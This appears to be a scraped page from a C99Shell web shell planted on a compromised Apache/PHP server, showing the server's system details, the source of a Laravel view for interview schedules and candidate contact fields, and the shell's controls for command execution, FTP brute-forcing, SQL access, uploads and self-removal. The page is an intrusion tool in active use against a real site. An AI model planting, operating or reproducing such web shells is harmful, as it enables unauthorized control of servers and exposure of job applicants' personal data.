!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/resources/views/interviewSchedule/   drwxrwxr-x
Free 13.04 GB of 57.97 GB (22.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     show.blade.php (2.57 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
{{--<div class="modal-body">--}}

    <div class="card-body">
            <h5 class="mb-4">{{__('Schedule Detail')}}</h5>
            <dl class="row mb-0 align-items-center">
                <dt class="col-sm-3 h6 text-sm">{{__('Job')}}</dt>
                <dd class="col-sm-9 text-sm">{{!empty($interviewSchedule->applications) ? !empty($interviewSchedule->applications->jobs) ? $interviewSchedule->applications->jobs->title : '-' : '-'}}</dd>
                <dt class="col-sm-3 h6 text-sm">{{__('Interview On')}}</dt>
                <dd class="col-sm-9 text-sm"> {{  \Auth::user()->dateFormat($interviewSchedule->date).' '. \Auth::user()->timeFormat($interviewSchedule->time) }}</dd>
                <dt class="col-sm-3 h6 text-sm">{{__('Assign Employee')}}</dt>
                <dd class="col-sm-9 text-sm">{{!empty($interviewSchedule->users)?$interviewSchedule->users->name:'-'}}</dd>

            </dl>

        </div>
        <div class="card-body">
            <h5 class="mb-4">{{__('Candidate Detail')}}</h5>
            <dl class="row mb-0 align-items-center">
                <dt class="col-sm-3 h6 text-sm">{{__('Name')}}</dt>
                <dd class="col-sm-9 text-sm">{{($interviewSchedule->applications)?$interviewSchedule->applications->name:'-'}}</dd>
                <dt class="col-sm-3 h6 text-sm">{{__('Email')}}</dt>
                <dd class="col-sm-9 text-sm"> {{($interviewSchedule->applications)?$interviewSchedule->applications->email:'-'}}</dd>
                <dt class="col-sm-3 h6 text-sm">{{__('Phone')}}</dt>
                <dd class="col-sm-9 text-sm">{{($interviewSchedule->applications)?$interviewSchedule->applications->phone:'-'}}</dd>
            </dl>
        </div>
        <div class="card-body">
            <h5 class="mb-4">{{__('Candidate Status')}}</h5>
            @foreach($stages as $stage)
                <div class="form-check-control custom-radio">
                    <input type="radio" id="stage_{{$stage->id}}" name="stage" data-scheduleid="{{$interviewSchedule->candidate}}" value="{{$stage->id}}" class="form-check-input stages" {{!empty($interviewSchedule->applications)?!empty($interviewSchedule->applications->stage==$stage->id)?'checked':'':''}}>
                    <label class="form-check-label" for="stage_{{$stage->id}}">{{$stage->title}}</label>
                </div>
            @endforeach
        </div>
        <div class="card-body">
            <a href="#" data-url="{{route('job.on.board.create', $interviewSchedule->candidate)}}"  data-ajax-popup="true"  class="btn btn-primary" >  {{__('Add to Job OnBoard')}}</a>
        </div>
{{--    </div>--}}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0205 ]--